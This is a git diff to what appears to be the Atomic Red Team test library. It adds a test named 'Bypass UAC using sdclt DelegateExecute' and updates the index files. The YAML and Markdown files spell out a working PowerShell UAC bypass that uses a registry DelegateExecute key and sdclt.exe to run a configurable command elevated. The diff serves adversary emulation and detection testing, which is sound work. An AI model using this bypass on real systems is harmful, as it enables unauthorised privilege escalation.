diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index beaa5dfd..5d84ca45 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -96,6 +96,7 @@ defense-evasion,T1088,Bypass User Account Control,3,Bypass UAC using Fodhelper
defense-evasion,T1088,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell
defense-evasion,T1088,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell)
defense-evasion,T1088,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories
+defense-evasion,T1088,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute
defense-evasion,T1191,CMSTP,1,CMSTP Executing Remote Scriptlet
defense-evasion,T1191,CMSTP,2,CMSTP Executing UAC Bypass
defense-evasion,T1146,Clear Command History,1,Clear Bash history (rm)
@@ -290,6 +291,7 @@ privilege-escalation,T1088,Bypass User Account Control,3,Bypass UAC using Fodhel
privilege-escalation,T1088,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell
privilege-escalation,T1088,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell)
privilege-escalation,T1088,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories
+privilege-escalation,T1088,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute
privilege-escalation,T1038,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll
privilege-escalation,T1519,Emond,1,Persistance with Event Monitor - emond
privilege-escalation,T1044,File System Permissions Weakness,1,File System Permissions Weakness
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 507ed651..d4575135 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -8,6 +8,7 @@ defense-evasion,T1088,Bypass User Account Control,3,Bypass UAC using Fodhelper
defense-evasion,T1088,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell
defense-evasion,T1088,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell)
defense-evasion,T1088,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories
+defense-evasion,T1088,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute
defense-evasion,T1191,CMSTP,1,CMSTP Executing Remote Scriptlet
defense-evasion,T1191,CMSTP,2,CMSTP Executing UAC Bypass
defense-evasion,T1500,Compile After Delivery,1,Compile After Delivery using csc.exe
@@ -140,6 +141,7 @@ privilege-escalation,T1088,Bypass User Account Control,3,Bypass UAC using Fodhel
privilege-escalation,T1088,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell
privilege-escalation,T1088,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell)
privilege-escalation,T1088,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories
+privilege-escalation,T1088,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute
privilege-escalation,T1038,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll
privilege-escalation,T1044,File System Permissions Weakness,1,File System Permissions Weakness
privilege-escalation,T1179,Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index d57e593a..31e8214b 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -167,6 +167,7 @@
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
+ - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- [T1191 CMSTP](../../T1191/T1191.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -437,6 +438,7 @@
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
+ - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- [T1038 DLL Search Order Hijacking](../../T1038/T1038.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- T1157 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index e4915031..475285dc 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -13,6 +13,7 @@
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
+ - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- [T1191 CMSTP](../../T1191/T1191.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -209,6 +210,7 @@
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
+ - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- [T1038 DLL Search Order Hijacking](../../T1038/T1038.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index f9512a17..79dc6311 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -6074,6 +6074,30 @@ defense-evasion:
cleanup_command: |
rd "\\?\C:\Windows \" /S /Q >nul 2>nul
del "c:\testbypass.exe" >nul 2>nul
+ - name: Bypass UAC using sdclt DelegateExecute
+ description: "Bypasses User Account Control using a fileless method, registry
+ only. \nUpon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe\n[Reference
+ - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)\nAdapted
+ from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)\n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ command.to.execute:
+ description: Command to execute
+ type: string
+ default: cmd.exe /c notepad.exe
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value '#{command.to.execute}'
+ New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute"
+ Start-Process -FilePath $env:windir\system32\sdclt.exe
+ Start-Sleep -s 3
+ cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse
+ -Force -ErrorAction Ignore
+
+'
T1191:
technique:
x_mitre_data_sources:
@@ -14605,6 +14629,30 @@ privilege-escalation:
cleanup_command: |
rd "\\?\C:\Windows \" /S /Q >nul 2>nul
del "c:\testbypass.exe" >nul 2>nul
+ - name: Bypass UAC using sdclt DelegateExecute
+ description: "Bypasses User Account Control using a fileless method, registry
+ only. \nUpon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe\n[Reference
+ - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)\nAdapted
+ from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)\n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ command.to.execute:
+ description: Command to execute
+ type: string
+ default: cmd.exe /c notepad.exe
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value '#{command.to.execute}'
+ New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute"
+ Start-Process -FilePath $env:windir\system32\sdclt.exe
+ Start-Sleep -s 3
+ cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse
+ -Force -ErrorAction Ignore
+
+'
T1038:
technique:
x_mitre_permissions_required:
diff --git a/atomics/T1088/T1088.md b/atomics/T1088/T1088.md
index f3be20d9..040bee66 100644
--- a/atomics/T1088/T1088.md
+++ b/atomics/T1088/T1088.md
@@ -24,6 +24,8 @@ Another bypass is possible through some Lateral Movement techniques if credentia
- [Atomic Test #6 - Bypass UAC by Mocking Trusted Directories](#atomic-test-6---bypass-uac-by-mocking-trusted-directories)
+- [Atomic Test #7 - Bypass UAC using sdclt DelegateExecute](#atomic-test-7---bypass-uac-using-sdclt-delegateexecute)
+
@@ -242,4 +244,43 @@ del "c:\testbypass.exe" >nul 2>nul
+
+
+
+## Atomic Test #7 - Bypass UAC using sdclt DelegateExecute
+Bypasses User Account Control using a fileless method, registry only.
+Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe
+[Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)
+Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| command.to.execute | Command to execute | string | cmd.exe /c notepad.exe|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value '#{command.to.execute}'
+New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute"
+Start-Process -FilePath $env:windir\system32\sdclt.exe
+Start-Sleep -s 3
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore
+```
+
+
+
+
+
diff --git a/atomics/T1088/T1088.yaml b/atomics/T1088/T1088.yaml
index 95121f78..f7d44c03 100644
--- a/atomics/T1088/T1088.yaml
+++ b/atomics/T1088/T1088.yaml
@@ -136,3 +136,29 @@ atomic_tests:
cleanup_command: |
rd "\\?\C:\Windows \" /S /Q >nul 2>nul
del "c:\testbypass.exe" >nul 2>nul
+
+- name: Bypass UAC using sdclt DelegateExecute
+ description: |
+ Bypasses User Account Control using a fileless method, registry only.
+ Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe
+ [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)
+ Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ command.to.execute:
+ description: Command to execute
+ type: string
+ default: cmd.exe /c notepad.exe
+
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value '#{command.to.execute}'
+ New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute"
+ Start-Process -FilePath $env:windir\system32\sdclt.exe
+ Start-Sleep -s 3
+ cleanup_command: |
+ Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore